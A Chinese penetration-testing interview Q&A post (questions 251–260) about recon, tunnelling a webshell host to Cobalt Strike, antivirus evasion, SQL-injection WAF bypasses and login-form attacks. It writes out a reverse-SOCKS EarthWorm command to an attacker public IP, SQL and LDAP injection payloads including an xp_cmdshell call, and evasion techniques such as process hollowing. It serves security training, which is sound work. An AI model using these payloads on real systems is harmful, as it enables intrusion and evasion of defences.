2025年渗透测试面试题总结-30(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

一、邮箱类型判断

二、真实IP确认方法

三、不出网机器上线CS

四、代理工具与杀软对抗

五、免杀技术核心思路

六、SQL注入Bypass技巧

七、红队HW信息收集

八、Whois信息内容

九、登录框攻击面

十、Python/PHP在渗透中的用途

复制代码
二百五十一、如何判断邮箱类型

二百五十二、如何确定你拿到的就是真实ip

二百五十三、机器不出网如何上线到cs(不出网的机器是拿到wenshell的机器)

二百五十四、走代理用哪些工具,遇到杀软怎么办

二百五十五、如何免杀

二百五十六、sql注入bypass有哪些(尽可能多说)

二百五十七、平常红队hw信息收集方式有哪些

二百五十八、whois 收集的信息包括哪些

二百五十九、给一个登录框能想到哪些利用方式

二百六十、平常开发经常用python 和php做什么

一、邮箱类型判断

  1. 域名分析
    • 企业邮箱:域名与公司官网一致(如 user@company.com
    • 公共邮箱:@gmail.com@qq.com
    • 自建邮箱:MX记录指向私有IP或非知名邮件服务商
  2. SMTP响应特征
    • 连接25/465端口,通过HELO命令返回服务标识(如Exchange、Postfix)
  3. 邮件头解析
    • 检查 Received: 字段中的服务器路径和中间件类型(如 X-Mailer: Sendmail

二、真实IP确认方法

  1. 网络层验证
    • 使用 traceroute 观察最后一跳IP
    • 检查TCP/IP数据包TTL值是否与宣称系统匹配
  2. 协议级检测
    • HTTP请求:对比 X-Forwarded-For 与TCP连接IP
    • SSL证书关联:扫描IP的443端口证书是否绑定目标域名
  3. 第三方平台验证
    • 通过Shodan/Censys搜索IP历史绑定记录
    • 利用CDN识别工具(如cdnchecker.com

三、不出网机器上线CS

前提:已获取Webshell但目标无外网连接

复制代码
mermaidgraph LR A[Webshell] --> B[上传代理工具] B --> C[建立内网隧道] C --> D[通过可控节点转发流量]
  1. 工具选择
    • reGeorg+Proxychains(HTTP隧道)
    • EarthWorm(SOCKS5反向代理)
  2. 关键步骤
    • 在可控公网服务器启动监听(ew -s rcsocks -l 1080 -e 8888
    • 从不出网机器反向连接:ew -s rssocks -d <公网IP> -e 8888
    • 配置CS监听器指向本地SOCKS代理

四、代理工具与杀软对抗

代理类型 推荐工具 免杀策略
HTTP隧道 reGeorg, Tiny 自定义响应头+流量AES加密
SOCKS5 EarthWorm, Neo-reGeorg 协议混淆(如伪装成SSL流量)
DNS隧道 dnscat2 使用TXT记录+长域名分割传输
对抗要点
  • 内存加密(如Cobalt Strike的Secure Profile
  • 流量特征修改(JA3指纹伪造)
  • 进程注入(注入到svchost.exe 等系统进程)

五、免杀技术核心思路

  1. 代码层面
    • Shellcode加密(AES/RC4)+ 运行时解密
    • API动态调用(通过Hash检索函数地址)
  2. 加载方式
    • 进程空洞(Process Hollowing)
    • 反射型DLL注入
  3. 行为伪装
    • 签名劫持(LOLBins)
    • 合法进程注入(如利用msbuild.exe 执行C#载荷)

六、SQL注入Bypass技巧

WAF绕过类

复制代码
sql/*!50000SELECT*/ 1,2,3 -- MySQL内联注释 SEL%0bECT 1,2,3 -- 空白符分割(%0b为垂直制表符) UNION ALL SELECT 1,2,3 -- 等价替换

过滤绕过类

  • 大小写/双写:uNIoN sELecTuniUNIONon selSELECTect
  • 编码转换:CHAR(65,66,67) 代替 'ABC'
  • 参数污染:id=1&id=2' and 1=1--

数据库特性利用

  • MySQL:/*!50000CONCAT*/(@@version)
  • MSSQL:DECLARE @a VARCHAR(50)=%27EXEC master..xp_cmdshell%27; EXEC(@a+%27whoami%27)

共整理37种Bypass手法(篇幅限制未全列),重点:理解WAF解析差异+数据库特性


七、红队HW信息收集

  1. 被动情报
    • Whois/备案查询 → 关联子公司和IP段
    • GitHub敏感信息扫描(API密钥、内部文档)
  2. 主动探测
    • 全端口扫描(Masscan)+ 服务识别(Nmap -sV)
    • 子域名爆破(*.target.com
  3. 社会工程
    • 员工领英信息 → 制作钓鱼字典
    • 公开招标文件 → 获取内部系统名称

八、Whois信息内容

复制代码
json{ "注册人": "姓名/组织(可能匿名)", "联系方式": "邮箱/电话(需验证)", "域名服务器": "NS1.xxx.com, NS2.xxx.com", "注册日期": "2020-01-01", "过期日期": "2025-12-31", "IP关联": "历史解析记录(通过APNIC数据库反查)" }

注意:GDPR可能导致欧洲域名信息隐藏


九、登录框攻击面

  1. 认证绕过
    • SQL注入:admin'--
    • Cookie篡改:admin=1; role=superuser
  2. 凭证相关
    • 暴力破解(Burp Intruder)
    • 密码重置逻辑漏洞(如修改接收邮箱)
  3. 后端漏洞
    • LDAP注入:*)(&
    • JWT密钥破解(jwt_tool)
  4. 前端风险
    • XSS存储型 → 窃取Cookie
    • CSRF → 强制修改密码

十、Python/PHP在渗透中的用途

语言 典型场景 常用库/框架
Python 漏洞PoC编写(Requests+BeautifulSoup) Scapy(流量伪造)、PyInstaller(打包)
C2开发(Flask/Socket) Pwntools(二进制利用)
PHP Webshell编写(蚁剑/冰蝎连接) Guzzle(HTTP代理穿透)
CMS漏洞利用(WordPress插件审计) PHP-FFI(调用系统API)

案例

  • Python自动化信息收集:subprocess调用Nmap+解析XML报告
  • PHP内存马:通过php://input注入恶意路由到正常应用